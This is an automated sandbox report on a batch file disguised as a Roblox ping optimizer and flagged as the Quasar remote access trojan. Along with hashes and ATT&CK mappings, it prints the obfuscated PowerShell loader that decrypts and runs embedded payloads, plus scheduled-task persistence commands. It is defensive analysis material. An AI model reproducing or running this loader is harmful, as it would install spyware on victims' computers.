quasar | 3d532f4155981fbaf60ddbaf14851a4b12d1066cbd182144ad0bdcd0b0f379a6

General

Target

RobloxPingOptimizer.bat
Size

273KB
MD5

0d3e0553b13ae24b0e765dc71b71d157
SHA1

2e7ea67463d79b9047aa843210667ac11da4650d
SHA256

3d532f4155981fbaf60ddbaf14851a4b12d1066cbd182144ad0bdcd0b0f379a6
SHA512

43b0250496746f8c161d3009f0842d2758eb80196ce7bc5e4f05a1ac552ae86ebece4fcb42a6b4f52be7981e01782817c56d12017d70c77e34327f63433a5da0
SSDEEP

6144:ymjeUWzu9cgBXKz1IQDKHkaIFH4zfWHF0QR1rh3Og2q4E:yseUWq9cgBazioKkaIEfOFtR1rh3Z2S

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4372-82-0x0000000007C90000-0x0000000007CEE000-memory.dmp	family_quasar

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

29 4372 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

992 powershell.exe
4372 powershell.exe
3752 powershell.exe

flow	pid	process
29	4372	powershell.exe

pid	process
992	powershell.exe
4372	powershell.exe
3752	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

Processes:

Runtime Broker.exe

pid process

1864 Runtime Broker.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

28 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

4144 schtasks.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings powershell.exe

pid	process
1864	Runtime Broker.exe

flow	ioc
28	ip-api.com

pid	process
4144	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRuntime Broker.exe

pid	process
3752	powershell.exe
3752	powershell.exe
992	powershell.exe
992	powershell.exe
4372	powershell.exe
4372	powershell.exe
4372	powershell.exe
1864	Runtime Broker.exe
1864	Runtime Broker.exe
1864	Runtime Broker.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3752	powershell.exe
Token: SeDebugPrivilege	992	powershell.exe
Token: SeIncreaseQuotaPrivilege	992	powershell.exe
Token: SeSecurityPrivilege	992	powershell.exe
Token: SeTakeOwnershipPrivilege	992	powershell.exe
Token: SeLoadDriverPrivilege	992	powershell.exe
Token: SeSystemProfilePrivilege	992	powershell.exe
Token: SeSystemtimePrivilege	992	powershell.exe
Token: SeProfSingleProcessPrivilege	992	powershell.exe
Token: SeIncBasePriorityPrivilege	992	powershell.exe
Token: SeCreatePagefilePrivilege	992	powershell.exe
Token: SeBackupPrivilege	992	powershell.exe
Token: SeRestorePrivilege	992	powershell.exe
Token: SeShutdownPrivilege	992	powershell.exe
Token: SeDebugPrivilege	992	powershell.exe
Token: SeSystemEnvironmentPrivilege	992	powershell.exe
Token: SeRemoteShutdownPrivilege	992	powershell.exe
Token: SeUndockPrivilege	992	powershell.exe
Token: SeManageVolumePrivilege	992	powershell.exe
Token: 33	992	powershell.exe
Token: 34	992	powershell.exe
Token: 35	992	powershell.exe
Token: 36	992	powershell.exe
Token: SeIncreaseQuotaPrivilege	992	powershell.exe
Token: SeSecurityPrivilege	992	powershell.exe
Token: SeTakeOwnershipPrivilege	992	powershell.exe
Token: SeLoadDriverPrivilege	992	powershell.exe
Token: SeSystemProfilePrivilege	992	powershell.exe
Token: SeSystemtimePrivilege	992	powershell.exe
Token: SeProfSingleProcessPrivilege	992	powershell.exe
Token: SeIncBasePriorityPrivilege	992	powershell.exe
Token: SeCreatePagefilePrivilege	992	powershell.exe
Token: SeBackupPrivilege	992	powershell.exe
Token: SeRestorePrivilege	992	powershell.exe
Token: SeShutdownPrivilege	992	powershell.exe
Token: SeDebugPrivilege	992	powershell.exe
Token: SeSystemEnvironmentPrivilege	992	powershell.exe
Token: SeRemoteShutdownPrivilege	992	powershell.exe
Token: SeUndockPrivilege	992	powershell.exe
Token: SeManageVolumePrivilege	992	powershell.exe
Token: 33	992	powershell.exe
Token: 34	992	powershell.exe
Token: 35	992	powershell.exe
Token: 36	992	powershell.exe
Token: SeIncreaseQuotaPrivilege	992	powershell.exe
Token: SeSecurityPrivilege	992	powershell.exe
Token: SeTakeOwnershipPrivilege	992	powershell.exe
Token: SeLoadDriverPrivilege	992	powershell.exe
Token: SeSystemProfilePrivilege	992	powershell.exe
Token: SeSystemtimePrivilege	992	powershell.exe
Token: SeProfSingleProcessPrivilege	992	powershell.exe
Token: SeIncBasePriorityPrivilege	992	powershell.exe
Token: SeCreatePagefilePrivilege	992	powershell.exe
Token: SeBackupPrivilege	992	powershell.exe
Token: SeRestorePrivilege	992	powershell.exe
Token: SeShutdownPrivilege	992	powershell.exe
Token: SeDebugPrivilege	992	powershell.exe
Token: SeSystemEnvironmentPrivilege	992	powershell.exe
Token: SeRemoteShutdownPrivilege	992	powershell.exe
Token: SeUndockPrivilege	992	powershell.exe
Token: SeManageVolumePrivilege	992	powershell.exe
Token: 33	992	powershell.exe
Token: 34	992	powershell.exe
Token: 35	992	powershell.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 3552 wrote to memory of 1612	3552	cmd.exe	cmd.exe
PID 3552 wrote to memory of 1612	3552	cmd.exe	cmd.exe
PID 3552 wrote to memory of 3752	3552	cmd.exe	powershell.exe
PID 3552 wrote to memory of 3752	3552	cmd.exe	powershell.exe
PID 3552 wrote to memory of 3752	3552	cmd.exe	powershell.exe
PID 3752 wrote to memory of 992	3752	powershell.exe	powershell.exe
PID 3752 wrote to memory of 992	3752	powershell.exe	powershell.exe
PID 3752 wrote to memory of 992	3752	powershell.exe	powershell.exe
PID 3752 wrote to memory of 1820	3752	powershell.exe	WScript.exe
PID 3752 wrote to memory of 1820	3752	powershell.exe	WScript.exe
PID 3752 wrote to memory of 1820	3752	powershell.exe	WScript.exe
PID 1820 wrote to memory of 2272	1820	WScript.exe	cmd.exe
PID 1820 wrote to memory of 2272	1820	WScript.exe	cmd.exe
PID 1820 wrote to memory of 2272	1820	WScript.exe	cmd.exe
PID 2272 wrote to memory of 3740	2272	cmd.exe	cmd.exe
PID 2272 wrote to memory of 3740	2272	cmd.exe	cmd.exe
PID 2272 wrote to memory of 3740	2272	cmd.exe	cmd.exe
PID 2272 wrote to memory of 4372	2272	cmd.exe	powershell.exe
PID 2272 wrote to memory of 4372	2272	cmd.exe	powershell.exe
PID 2272 wrote to memory of 4372	2272	cmd.exe	powershell.exe
PID 4372 wrote to memory of 4144	4372	powershell.exe	schtasks.exe
PID 4372 wrote to memory of 4144	4372	powershell.exe	schtasks.exe
PID 4372 wrote to memory of 4144	4372	powershell.exe	schtasks.exe
PID 4372 wrote to memory of 1864	4372	powershell.exe	Runtime Broker.exe
PID 4372 wrote to memory of 1864	4372	powershell.exe	Runtime Broker.exe
PID 4372 wrote to memory of 1864	4372	powershell.exe	Runtime Broker.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RobloxPingOptimizer.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1wL4kmOdB2R3iGa/mEDXbQunvSUVKGrVuRrft2dp9pw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BFwaf2FXZug80opDTZLBSA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HKEwQ=New-Object System.IO.MemoryStream(,$param_var); $kVcOJ=New-Object System.IO.MemoryStream; $eLOZz=New-Object System.IO.Compression.GZipStream($HKEwQ, [IO.Compression.CompressionMode]::Decompress); $eLOZz.CopyTo($kVcOJ); $eLOZz.Dispose(); $HKEwQ.Dispose(); $kVcOJ.Dispose(); $kVcOJ.ToArray();}function execute_function($param_var,$param2_var){ $YpwEB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XnPgt=$YpwEB.EntryPoint; $XnPgt.Invoke($null, $param2_var);}$tHcqT = 'C:\Users\Admin\AppData\Local\Temp\RobloxPingOptimizer.bat';$host.UI.RawUI.WindowTitle = $tHcqT;$AjwOC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tHcqT).Split([Environment]::NewLine);foreach ($vriJL in $AjwOC) { if ($vriJL.StartsWith('jwbKUUEoLPvvJlZYWdJd')) { $srAUX=$vriJL.Substring(20); break; }}$payloads_var=[string[]]$srAUX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
2⤵
PID:1612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3752

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_722_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_722.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:992

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_722.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1820

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_722.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:2272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1wL4kmOdB2R3iGa/mEDXbQunvSUVKGrVuRrft2dp9pw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BFwaf2FXZug80opDTZLBSA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HKEwQ=New-Object System.IO.MemoryStream(,$param_var); $kVcOJ=New-Object System.IO.MemoryStream; $eLOZz=New-Object System.IO.Compression.GZipStream($HKEwQ, [IO.Compression.CompressionMode]::Decompress); $eLOZz.CopyTo($kVcOJ); $eLOZz.Dispose(); $HKEwQ.Dispose(); $kVcOJ.Dispose(); $kVcOJ.ToArray();}function execute_function($param_var,$param2_var){ $YpwEB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XnPgt=$YpwEB.EntryPoint; $XnPgt.Invoke($null, $param2_var);}$tHcqT = 'C:\Users\Admin\AppData\Roaming\Windows_Log_722.bat';$host.UI.RawUI.WindowTitle = $tHcqT;$AjwOC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tHcqT).Split([Environment]::NewLine);foreach ($vriJL in $AjwOC) { if ($vriJL.StartsWith('jwbKUUEoLPvvJlZYWdJd')) { $srAUX=$vriJL.Substring(20); break; }}$payloads_var=[string[]]$srAUX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
5⤵
PID:3740

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4372

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:4144

C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

Scheduled Task/Job

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
9751fcb3d8dc82d33d50eebe53abe314

SHA1
7a680212700a5d9f3ca67c81e0e243834387c20c

SHA256
ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

SHA512
54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
21KB

MD5
e8a1d2e37447361e22c1f26afc1ef1e5

SHA1
9394f7a0261d827e62bd85c77e744a8d8a163044

SHA256
3ad7a86296cbe43ab0d5754ea322d11993b6bb6e472e6d2d8413f07c5a81868b

SHA512
28c2ed3384ad00abaf87e566ac6e86200f20a086bd35456725c0e88a11f0744ffb53786b5c76e5b0c88e11053fde3b100549fb8e29992e30f071023eeec72119

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
20KB

MD5
b5664741c1c232dfa802c70016a0c0bb

SHA1
aaafd2f550c416eb9a6c776dd686acc001f9793c

SHA256
57bda5552ea8968f9a1c233b74522f31309465c5ccd75e813ae4bfefad965bc3

SHA512
7ae81c215b9a909f95e2a2b980f660a9cc47249f11faa82e097b3ec6c48c1399babec6d8f41c40669edd02062d45385a774e9e1a48284cb1ff39f86f70f188ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dntvsgkp.oym.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_722.bat
Filesize
273KB

MD5
0d3e0553b13ae24b0e765dc71b71d157

SHA1
2e7ea67463d79b9047aa843210667ac11da4650d

SHA256
3d532f4155981fbaf60ddbaf14851a4b12d1066cbd182144ad0bdcd0b0f379a6

SHA512
43b0250496746f8c161d3009f0842d2758eb80196ce7bc5e4f05a1ac552ae86ebece4fcb42a6b4f52be7981e01782817c56d12017d70c77e34327f63433a5da0

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_722.vbs
Filesize
115B

MD5
244cdde6c7d05c2a5ad6e42f08db4083

SHA1
24a4d536db3aa4e1dfd53d6118edfbf46ce63658

SHA256
f9d05f1838acf8a8376e7e3a608dc90956360d505cd0966ca3d4d6b62c93ca9f

SHA512
45fd1a8dfaaf13df79b2c4be69dc8dfeb6e27541d4774afb651d9314f3bcbd14d3f94eb66bce2c5a175a1f90e877c49d2732de8c826bc7e0f9cf5214b390ef09

Download Submit
memory/992-62-0x0000000074AD0000-0x0000000075280000-memory.dmp

Filesize
7.7MB

Download
memory/992-41-0x0000000070870000-0x00000000708BC000-memory.dmp

Filesize
304KB

Download
memory/992-59-0x0000000074AD0000-0x0000000075280000-memory.dmp

Filesize
7.7MB

Download
memory/992-58-0x00000000076D0000-0x00000000076E1000-memory.dmp

Filesize
68KB

Download
memory/992-57-0x0000000007760000-0x00000000077F6000-memory.dmp

Filesize
600KB

Download
memory/992-56-0x0000000007540000-0x000000000754A000-memory.dmp

Filesize
40KB

Download
memory/992-55-0x0000000074AD0000-0x0000000075280000-memory.dmp

Filesize
7.7MB

Download
memory/992-54-0x00000000073A0000-0x0000000007443000-memory.dmp

Filesize
652KB

Download
memory/992-53-0x0000000007340000-0x000000000735E000-memory.dmp

Filesize
120KB

Download
memory/992-52-0x0000000074AD0000-0x0000000075280000-memory.dmp

Filesize
7.7MB

Download
memory/992-51-0x0000000074AD0000-0x0000000075280000-memory.dmp

Filesize
7.7MB

Download
memory/992-40-0x0000000007360000-0x0000000007392000-memory.dmp

Filesize
200KB

Download
memory/992-28-0x0000000074AD0000-0x0000000075280000-memory.dmp

Filesize
7.7MB

Download
memory/992-29-0x0000000074AD0000-0x0000000075280000-memory.dmp

Filesize
7.7MB

Download
memory/992-30-0x0000000074AD0000-0x0000000075280000-memory.dmp

Filesize
7.7MB

Download
memory/3752-25-0x0000000007A10000-0x0000000007A46000-memory.dmp

Filesize
216KB

Download
memory/3752-0-0x0000000074ADE000-0x0000000074ADF000-memory.dmp

Filesize
4KB

Download
memory/3752-16-0x0000000006060000-0x00000000060C6000-memory.dmp

Filesize
408KB

Download
memory/3752-24-0x00000000079F0000-0x00000000079F8000-memory.dmp

Filesize
32KB

Download
memory/3752-23-0x00000000078D0000-0x00000000078EA000-memory.dmp

Filesize
104KB

Download
memory/3752-22-0x0000000007F30000-0x00000000085AA000-memory.dmp

Filesize
6.5MB

Download
memory/3752-21-0x0000000007830000-0x00000000078A6000-memory.dmp

Filesize
472KB

Download
memory/3752-20-0x0000000006AB0000-0x0000000006AF4000-memory.dmp

Filesize
272KB

Download
memory/3752-19-0x0000000006590000-0x00000000065DC000-memory.dmp

Filesize
304KB

Download
memory/3752-18-0x0000000006550000-0x000000000656E000-memory.dmp

Filesize
120KB

Download
memory/3752-17-0x00000000060D0000-0x0000000006424000-memory.dmp

Filesize
3.3MB

Download
memory/3752-26-0x0000000008B60000-0x0000000009104000-memory.dmp

Filesize
5.6MB

Download
memory/3752-11-0x0000000005F80000-0x0000000005FE6000-memory.dmp

Filesize
408KB

Download
memory/3752-5-0x0000000005EE0000-0x0000000005F02000-memory.dmp

Filesize
136KB

Download
memory/3752-4-0x0000000074AD0000-0x0000000075280000-memory.dmp

Filesize
7.7MB

Download
memory/3752-3-0x00000000057E0000-0x0000000005E08000-memory.dmp

Filesize
6.2MB

Download
memory/3752-80-0x0000000074AD0000-0x0000000075280000-memory.dmp

Filesize
7.7MB

Download
memory/3752-1-0x00000000050A0000-0x00000000050D6000-memory.dmp

Filesize
216KB

Download
memory/3752-2-0x0000000074AD0000-0x0000000075280000-memory.dmp

Filesize
7.7MB

Download
memory/4372-83-0x0000000007D90000-0x0000000007E22000-memory.dmp

Filesize
584KB

Download
memory/4372-84-0x0000000007EB0000-0x0000000007EC2000-memory.dmp

Filesize
72KB

Download
memory/4372-85-0x0000000008010000-0x000000000804C000-memory.dmp

Filesize
240KB

Download
memory/4372-82-0x0000000007C90000-0x0000000007CEE000-memory.dmp

Filesize
376KB

Download
memory/4372-81-0x00000000062C0000-0x00000000062F6000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads